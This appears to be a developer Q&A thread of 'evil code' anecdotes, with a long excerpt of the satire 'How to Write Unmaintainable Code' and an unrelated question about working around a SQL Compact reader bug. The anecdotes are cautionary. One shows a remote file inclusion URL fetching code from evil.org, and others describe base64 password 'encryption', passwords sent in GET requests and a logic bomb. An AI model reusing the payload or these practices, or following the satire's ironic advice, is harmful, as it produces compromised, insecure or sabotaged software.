With all that said, the single biggest problem with this 130,000 line application is this: no unit tests.
Yes, I have sent this story to TheDailyWTF, and then I quit my job.
In a system which took credit card payments we used to store the full credit card number along with name, expiration date etc.
Turns out this is illegal, which is ironic given that we were writing the program for the Justice Department at the time.
I've seen a password encryption function like this
function EncryptPassword($password)
{
    return base64_encode($password);
}
This was the error handling routine in a piece of commercial code:
/* FIXME! */
while (TRUE)
;
I was supposed to find out why "the app keeps locking up".
Combination of all of the following Php 'Features' at once.
Register Globals
Variable Variables
Inclusion of remote files and code via include("http:// ... ");
Really Horrific Array/Variable names ( Literal example ):
foreach( $variablesarry as $variablearry ){
    include( $$variablearry );
}
( I literally spent an hour trying to work out how that worked before I realised they weren't the same variable )
Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.
For those who don't know variable variables:
$x = "hello";
$$x = "world";
print $hello # "world" ;
Now consider $x contains a value from your URL ( register globals magic ), so nowhere in your code is it obvious what variable you're working with because it's all determined by the URL.
Now consider what happens when the contents of that variable can be a URL specified by the website's user.
Yes, this may not make sense to you, but it creates a variable named after that URL, i.e.:
$http://google.com,
except it can't be directly accessed; you have to use it via the double-$ technique above.
Additionally, when it's possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like
http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php
and if that variable turns up in include($include)
and if 'evilcode.php' prints its code as plain text, and PHP is inappropriately secured, PHP will just trundle off, download evilcode.php, and execute it as the user of the web server.
The web server will give it all its permissions etc., permitting shell calls, downloading arbitrary binaries and running them, etc., until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with Italian dubbing, being shared on IRC via a bot.
I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|
( I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. It's just a shame I discovered the dailywtf after I escaped that code )
In the main project header file, from an old-hand COBOL programmer, who was inexplicably writing a compiler in C:
int i, j, k;
"So you won't get a compiler error if you forget to declare your loop variables."
The Windows installer.
This article How to Write Unmaintainable Code covers some of the most brilliant techniques known to man. Some of my favorite ones are:
New Uses For Names For Baby
Buy a copy of a baby naming book and you'll never be at a loss for variable names. Fred is a wonderful name, and easy to type. If you're looking for easy-to-type variable names, try adsf or aoeu if you type with a DSK keyboard.
Creative Miss-spelling
If you must use descriptive variable and function names, misspell them. By misspelling in some function and variable names, and spelling it correctly in others (such as SetPintleOpening SetPintalClosing) we effectively negate the use of grep or IDE search techniques. It works amazingly well. Add an international flavor by spelling tory or tori in different theatres/theaters.
Be Abstract
In naming functions and variables, make heavy use of abstract words like it, everything, data, handle, stuff, do, routine, perform and the digits e.g. routineX48, PerformDataFunction, DoIt, HandleStuff and do_args_method.
CapiTaliSaTion
Randomly capitalize the first letter of a syllable in the middle of a word. For example ComputeRasterHistoGram().
Lower Case l Looks a Lot Like the Digit 1
Use lower case l to indicate long constants. e.g. 10l is more likely to be mistaken for 101 than 10L is. Ban any fonts that clearly disambiguate uvw wW gq9 2z 5s il17|!j oO08 `'" ;,. m nn rn {[()]}. Be creative.
Recycle Your Variables
Wherever scope rules permit, reuse existing unrelated variable names. Similarly, use the same temporary variable for two unrelated purposes (purporting to save stack slots). For a fiendish variant, morph the variable, for example, assign a value to a variable at the top of a very long method, and then somewhere in the middle, change the meaning of the variable in a subtle way, such as converting it from a 0-based coordinate to a 1-based coordinate. Be certain not to document this change in meaning.
Cd wrttn wtht vwls s mch trsr
When using abbreviations inside variable or method names, break the boredom with several variants for the same word, and even spell it out longhand once in a while. This helps defeat those lazy bums who use text search to understand only some aspect of your program. Consider variant spellings as a variant on the ploy, e.g. mixing International colour, with American color and dude-speak kulerz. If you spell out names in full, there is only one possible way to spell each name. These are too easy for the maintenance programmer to remember. Because there are so many different ways to abbreviate a word, with abbreviations, you can have several different variables that all have the same apparent purpose. As an added bonus, the maintenance programmer might not even notice they are separate variables.
Obscure film references
Use constant names like LancelotsFavouriteColour instead of blue and assign it hex value of $0204FB. The color looks identical to pure blue on the screen, and a maintenance programmer would have to work out 0204FB (or use some graphic tool) to know what it looks like. Only someone intimately familiar with Monty Python and the Holy Grail would know that Lancelot's favorite color was blue. If a maintenance programmer can't quote entire Monty Python movies from memory, he or she has no business being a programmer.
Document the obvious
Pepper the code with comments like /* add 1 to i */ however, never document wooly stuff like the overall purpose of the package or method.
Document How Not Why
Document only the details of what a program does, not what it is attempting to accomplish. That way, if there is a bug, the fixer will have no clue what the code should be doing.
Side Effects
In C, functions are supposed to be idempotent, (without side effects). I hope that hint is sufficient.
Use Octal
Smuggle octal literals into a list of decimal numbers like this:
array = new int []
{
    111,
    120,
    013,
    121,
};
Extended ASCII
Extended ASCII characters are perfectly valid as variable names, including ß, Ð, and ñ characters. They are almost impossible to type without copying/pasting in a simple text editor.
Names From Other Languages
Use foreign language dictionaries as a source for variable names. For example, use the German punkt for point. Maintenance coders, without your firm grasp of German, will enjoy the multicultural experience of deciphering the meaning.
Names From Mathematics
Choose variable names that masquerade as mathematical operators, e.g.:
openParen = (slash + asterix) / equals;
Code That Masquerades As Comments and Vice Versa
Include sections of code that is commented out but at first glance does not appear to be.
for(j=0; j<array_len; j+ =8)
{
total += array[j+0 ];
total += array[j+1 ];
total += array[j+2 ]; /* Main body of
total += array[j+3]; * loop is unrolled
total += array[j+4]; * for greater speed.
total += array[j+5]; */
total += array[j+6 ];
total += array[j+7 ];
}
Without the colour coding would you notice that three lines of code are commented out?
Arbitrary Names That Masquerade as Keywords
When documenting, and you need an arbitrary name to represent a filename use "file ". Never use an obviously arbitrary name like "Charlie.dat" or "Frodo.txt". In general, in your examples, use arbitrary names that sound as much like reserved keywords as possible. For example, good names for parameters or variables would be"bank", "blank", "class", "const ", "constant", "input", "key", "keyword", "kind", "output", "parameter" "parm", "system", "type", "value", "var" and "variable ". If you use actual reserved words for your arbitrary names, which would be rejected by your command processor or compiler, so much the better. If you do this well, the users will be hopelessly confused between reserved keywords and arbitrary names in your example, but you can look innocent, claiming you did it to help them associate the appropriate purpose with each variable.
Code Names Must Not Match Screen Names
Choose your variable names to have absolutely no relation to the labels used when such variables are displayed on the screen. E.g. on the screen label the field "Postal Code" but in the code call the associated variable "zip".
Choosing The Best Overload Operator
In C++, overload +,-,*,/ to do things totally unrelated to addition, subtraction etc. After all, if Stroustrup can use the shift operator to do I/O, why should you not be equally creative? If you overload +, make sure you do it in a way that i = i + 5; has a totally different meaning from i += 5; Here is an example of elevating overloading operator obfuscation to a high art. Overload the '!' operator for a class, but have the overload have nothing to do with inverting or negating. Make it return an integer. Then, in order to get a logical value for it, you must use '! !'. However, this inverts the logic, so [drum roll] you must use '! ! !'. Don't confuse the ! operator, which returns a boolean 0 or 1, with the ~ bitwise logical negation operator.
Exceptions
I am going to let you in on a little-known coding secret. Exceptions are a pain in the behind. Properly-written code never fails, so exceptions are actually unnecessary. Don't waste time on them. Subclassing exceptions is for incompetents who know their code will fail. You can greatly simplify your program by having only a single try/catch in the entire application (in main) that calls System.exit(). Just stick a perfectly standard set of throws on every method header whether they could actually throw any exceptions or not.
Magic Matrix Locations
Use special values in certain matrix locations as flags. A good choice is the [3][0] element in a transformation matrix used with a homogeneous coordinate system.
Magic Array Slots revisited
If you need several variables of a given type, just define an array of them, then access them by number. Pick a numbering convention that only you know and don't document it. And don't bother to define #define constants for the indexes. Everybody should just know that the global variable widget[15] is the cancel button. This is just an up-to-date variant on using absolute numerical addresses in assembler code.
Never Beautify
Never use an automated source code tidier (beautifier) to keep your code aligned. Lobby to have them banned from your company on the grounds they create false deltas in PVCS/CVS (version control tracking) or that every programmer should have his own indenting style held forever sacrosanct for any module he wrote. Insist that other programmers observe those idiosyncratic conventions in "his " modules. Banning beautifiers is quite easy, even though they save millions of keystrokes doing manual alignment and days wasted misinterpreting poorly aligned code. Just insist that everyone use the same tidied format, not just for storing in the common repository, but also while they are editing. This starts an RWAR and the boss, to keep the peace, will ban automated tidying. Without automated tidying, you are now free to accidentally misalign the code to give the optical illusion that bodies of loops and ifs are longer or shorter than they really are, or that else clauses match a different if than they really do. e.g.
if(a)
if(b) x=y;
else x=z;
Testing is for cowards
A brave coder will bypass that step. Too many programmers are afraid of their boss, afraid of losing their job, afraid of customer hate mail and afraid of being sued. This fear paralyzes action, and reduces productivity. Studies have shown that eliminating the test phase means that managers can set ship dates well in advance, an obvious aid in the planning process. With fear gone, innovation and experimentation can blossom. The role of the programmer is to produce code, and debugging can be done by a cooperative effort on the part of the help desk and the legacy maintenance group.
If we have full confidence in our coding ability, then testing will be unnecessary. If we look at this logically, then any fool can recognise that testing does not even attempt to solve a technical problem, rather, this is a problem of emotional confidence. A more efficient solution to this lack of confidence issue is to eliminate testing completely and send our programmers to self-esteem courses. After all, if we choose to do testing, then we have to test every program change, but we only need to send the programmers to one course on building self-esteem. The cost benefit is as amazing as it is obvious.
Reverse the Usual True False Convention
Reverse the usual definitions of true and false. Sounds very obvious but it works great. You can hide:
#define TRUE 0
#define FALSE 1
somewhere deep in the code so that it is dredged up from the bowels of the program from some file that noone ever looks at anymore. Then force the program to do comparisons like:
if ( var == TRUE )
if ( var != FALSE )
someone is bound to "correct" the apparent redundancy, and use var elsewhere in the usual way:
if ( var )
Another technique is to make TRUE and FALSE have the same value, though most would consider that out and out cheating. Using values 1 and 2 or -1 and 0 is a more subtle way to trip people up and still look respectable. You can use this same technique in Java by defining a static constant called TRUE. Programmers might be more suspicious you are up to no good since there is a built-in literal true in Java.
Exploit Schizophrenia
Java is schizophrenic about array declarations. You can do them the old C way, String x[], (which uses mixed pre-postfix notation) or the new way, String[] x, which uses pure prefix notation. If you want to really confuse people, mix the notations, e.g.
byte[ ] rowvector, colvector , matrix[ ];
which is equivalent to:
byte[ ] rowvector;
byte[ ] colvector;
byte[ ][] matrix;
I don't know if I'd call the code "evil", but we had a developer who would create Object[] arrays instead of writing classes. Everywhere.
I have seen (and posted to thedailywtf) code that gives everyone administrator rights in a significant part of an application on Tuesdays. I guess the original developer forgot to remove the code after local machine testing.
I don't know if this is "evil" so much as misguided (I recently posted it on The Old New Thing):
I knew one guy who loved to store information as delimited strings. He was familiar with the concept of arrays, as shown when he used arrays of delimited strings, but the light bulb never lit up.
Base 36 encoding to store ints in strings.
I guess the theory goes somewhat along the lines of:
Hexadecimal is used to represent numbers
Hexadecimal doesn't use letters beyond F, meaning G-Z are wasted
Waste is bad
At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.
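For the curious, the decode is simple enough; here's a quick illustrative sketch (my own code, just to show the arithmetic):
// "3J" in base 36 is 3 * 36 + 19 = 127, i.e. all seven day-of-week bits set.
static int FromBase36(string value)
{
    const string digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int result = 0;
    foreach (char c in value.Trim().ToUpperInvariant())
        result = result * 36 + digits.IndexOf(c);
    return result;
}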
I remember seeing a login handler that took a post request, and redirected to a GET with the user name and password passed in as parameters. This was for an "enterprise class" medical system.
I noticed this while checking some logs - I was very tempted to send the CEO his password.
Really evil was this piece of brilliant Delphi code:
type
  TMyClass = class
  private
    FField : Integer;
  public
    procedure DoSomething;
  end;

var
  myclass : TMyClass;

procedure TMyClass.DoSomething;
begin
  myclass.FField := xxx; //
end;
It worked great if there was only one instance of the class. But unfortunately I had to use another instance, and that created lots of interesting bugs.
When I found this jewel, I can't remember if I fainted or screamed, probably both.
Maybe not evil, but certainly rather, um... misguided.
I once had to rewrite a "natural language parser" that was implemented as a single 5,000 line if...then statement.
as in...
if (text == "hello" || text == "hi")
response = "hello";
else if (text == "goodbye")
response = "bye";
else
...
I saw code in an ASP.NET MVC site from a guy who had only done web forms before (and is a renowned copy/paster!) that stuck a client side click event on an <a> tag that called a javascript method that did a document.location.
I tried to explain that a href on the <a> tag would do the same!!!
A little evil... someone I know wrote, into the main internal company web app, a daily check to see if he had logged into the system in the past 10 days. If there's no record of him logging in, it disables the app for everyone in the company.
He wrote the piece once he heard rumors of layoffs, and if he was going down, the company would have to suffer.
The only reason I knew about it, is that he took a 2 week vacation & I called him when the site crapped out. He told me to log on with his username/password...and all was fine again.
Of course..months later we all got laid off.
My colleague likes to recall that ASP.NET application which used a public static database connection for all database work.
Yes, one connection for all requests. And no, there was no locking done either.
I remember having to setup IIS 3 to run Perl CGI scripts (yes, that was a looong time ago). The official recommendation at that time was to put Perl.exe in cgi-bin. It worked, but it also gave everyone access to a pretty powerful scripting engine!
Any RFC 3514-compliant program which sets the evil bit.
SQL queries right there in javascript in an ASP application. Can't get any dirtier...
We had an application that loaded all of its global state from an XML file. No problem with that, except that the developer had created a new form of recursion.
<settings>
  <property>
    <name>...</name>
    <value>...</value>
    <property>
      <name>...</name>
      <value>...</value>
      <property>
        <name>...</name>
        <value>...</value>
        <property>
          <name>...</name>
          <value>...</value>
          <property>
            <name>...</name>
            <value>...</value>
            <property>
              <name>...</name>
              <value>...</value>
              <property>
Then comes the fun part. When the application loads, it runs through the list of properties and adds them to a global (flat) list, along with incrementing a mystery counter. The mystery counter is named something totally irrelevant and is used in mystery calculations:
List properties = new List();
Node <- root
while node.hasNode("property")
    add to properties list
    my_global_variable++;
    if hasNode("property")
        node = getNode("property"), ... etc etc
And then you get functions like
calculateSumOfCombinations(int x, int y){
    return x + y + my_global_variable;
}
edit: clarification - It took me a long time to figure out that he was counting the depth of the recursion, because at level 6 or 7 the properties changed meaning, so he was using the counter to split his flat set into 2 sets of different types (kind of like having a list of STATE, STATE, STATE, CITY, CITY, CITY and checking if the index > counter to see whether your name is a city or a state).
Instead of writing a Windows service for a server process that needed to run constantly, one of our "architects" wrote a console app and used the task scheduler to run it every 60 seconds.
Keep in mind this is in .NET where services are very easy to create.
--
Also, at the same place a console app was used to host a .NET remoting service, so they had to start the console app and lock a session to keep it running every time the server was rebooted.
--
At the last place I worked one of the architects had a single C# source code file with over 100 classes that was something like 250K in size.
32 source code files with more than 10K lines of code each. Each contained one class. Each class contained one method that did "everything".
That was a real nightmare to debug before I had to refactor it.
At an earlier workplace, we inherited a legacy project which had partially been outsourced earlier. The main app was Java; the outsourced part was a native C library. Once I had a look at the C source files and listed the contents of the directory. There were several source files over 200K in size. The biggest C file was 600 Kbytes.
Thank God I never had to actually touch them :-)
I was given a set of programs to advance while colleagues were abroad at a customer (installing said programs). One key library came up in every program, and trying to figure out the code, I realised that there were tiny differences from one program to the next. In a common library.
Realising this, I ran a text comparison of all copies. Out of 16, I think there were about 9 unique ones. I threw a bit of a fit.
The boss intervened and had the colleagues collate a version that was seemingly universal. They sent the code by e-mail. Unknown to me, there were strings with unprintable characters in there, and some mixed encodings. The e-mail garbled it pretty bad.
The unprintable characters were used to send out data (all strings!) from a server to a client. All strings were thus separated by the 0x03 character on the server-side, and re-assembled client-side in C# using the Split function.
The somewhat sane way would have been to do:
someVariable.Split(Convert.ToChar(0x03));
The saner and friendly way would have been to use a constant:
private const char StringSeparator = (char)0x03;
//...
someVariable.Split(StringSeparator);
The EVIL way was what my colleagues chose: use whatever "prints" for 0x03 in Visual Studio and put that between quotes:
someVariable.Split('/*unprintable character*/');
Furthermore, in this library (and all the related programs), not a single variable was local (I checked!). Functions were designed either to reuse the same variables once it was deemed safe to clobber them, or to create new ones which would live on for the duration of the process. I printed out several pages and colour coded them. Yellow meant "global, never changed by another function", red meant "global, changed by several". Green would have been "local", but there was none.
Oh, did I mention version control? Because of course there was none.
ADD ON: I just remembered a function I discovered, not long ago.
Its purpose was to go through an array of arrays of integers, and set each first and last item to 0. It went like this (not actual code, from memory, and more C#-esque):
FixAllArrays()
{
    for (int idx = 0; idx < arrays.count - 1; idx++)
    {
        currArray = arrays[idx];
        nextArray = arrays[idx + 1];
        SetFirstToZero(currArray);
        SetLastToZero(nextArray);
        //This is where the fun starts
        if (idx == 0)
        {
            SetLastToZero(currArray);
        }
        if (idx == arrays.count - 1)
        {
            SetFirstToZero(nextArray);
        }
    }
}
Of course, the point was that every sub-array had to get this done, both operations, on all items. I'm just not sure how a programmer can decide on something like this.
Similar to what someone else mentioned above:
I worked in a place that had a pseudo-scripting language in the application. It fed into a massive method that had some 30 parameters and a giant Select Case statement.
It was time to add more parameters, but the guy on the team who had to do it realized that there were too many already.
His solution?
He added a single object parameter on the end, so he could pass in anything he wanted and then cast it.
I couldn't get out of that place fast enough.
Once, after our client teams reported some weird problems, we noticed that two different versions of the application were pointing to the same database. (While deploying the new system to them, their database was upgraded, but everyone forgot to bring down their old system.)
This was a miracle escape..
And since then, we have an automated build and deploy process, thankfully :-)
I think that it was a program which loaded a loop into the general purpose registers of a PDP-10 and then executed the code in those registers.
You could do that on a PDP-10. That doesn't mean that you should.
EDIT: at least this is to the best of my (sometimes quite shabby) recollection.
I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.
The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).
It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.
It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.
I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.

Hacky Sql Compact Workaround

So, I'm trying to use ADO.NET to stream file data stored in an image column in a SQL Compact database.
To do this, I wrote a DataReaderStream class that takes a data reader, opened for sequential access, and represents it as a stream, redirecting calls to Read(...) on the stream to IDataReader.GetBytes(...).
One "weird" aspect of IDataReader.GetBytes(...), when compared to the Stream class, is that GetBytes requires the client to increment an offset and pass that in each time it's called. It does this even though access is sequential, and it's not possible to read "backwards" in the data reader stream.
The SqlCeDataReader implementation of IDataReader enforces this by incrementing an internal counter that identifies the total number of bytes it has returned. If you pass in a number either less than or greater than that number, the method will throw an InvalidOperationException.
The problem with this, however, is that there is a bug in the SqlCeDataReader implementation that causes it to set the internal counter to the wrong value. This results in subsequent calls to Read on my stream throwing exceptions when they shouldn't be.
I found some information about the bug on this MSDN thread.
I was able to come up with a disgusting, horribly hacky workaround, that basically uses reflection to update the field in the class to the correct value.
The code looks like this:
public override int Read(byte[] buffer, int offset, int count)
{
    m_length = m_length ?? m_dr.GetBytes(0, 0, null, offset, count);
    if (m_fieldOffSet < m_length)
    {
        var bytesRead = m_dr.GetBytes(0, m_fieldOffSet, buffer, offset, count);
        m_fieldOffSet += bytesRead;
        if (m_dr is SqlCeDataReader)
        {
            //BEGIN HACK
            //This is a horrible HACK.
            m_field = m_field ?? typeof (SqlCeDataReader).GetField("sequentialUnitsRead", BindingFlags.NonPublic | BindingFlags.Instance);
            var length = (long)(m_field.GetValue(m_dr));
            if (length != m_fieldOffSet)
            {
                m_field.SetValue(m_dr, m_fieldOffSet);
            }
            //END HACK
        }
        return (int) bytesRead;
    }
    else
    {
        return 0;
    }
}
For obvious reasons, I would prefer to not use this.
However, I do not want to buffer the entire contents of the blob in memory either.
Does anyone know of a way I can get streaming data out of a SQL Compact database without having to resort to such horrible code?
I contacted Microsoft (through the SQL Compact Blog) and they confirmed the bug, and suggested I use OLEDB as a workaround. So, I'll try that and see if that works for me.
Actually, I decided to fix the problem by just not storing blobs in the database to begin with.
This eliminates the problem (I can stream data from a file), and also fixes some issues I might have run into with Sql Compact's 4 GB size limit.